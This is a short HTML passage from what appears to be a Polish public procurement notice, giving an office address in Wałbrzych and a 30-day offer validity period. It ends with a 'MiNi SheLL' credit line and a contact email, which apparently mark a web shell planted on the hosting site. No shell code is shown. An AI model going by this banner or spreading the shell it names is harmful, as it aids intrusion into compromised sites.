58-302 Wałbrzych, sekretariat I piętro, pokój nr 108.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com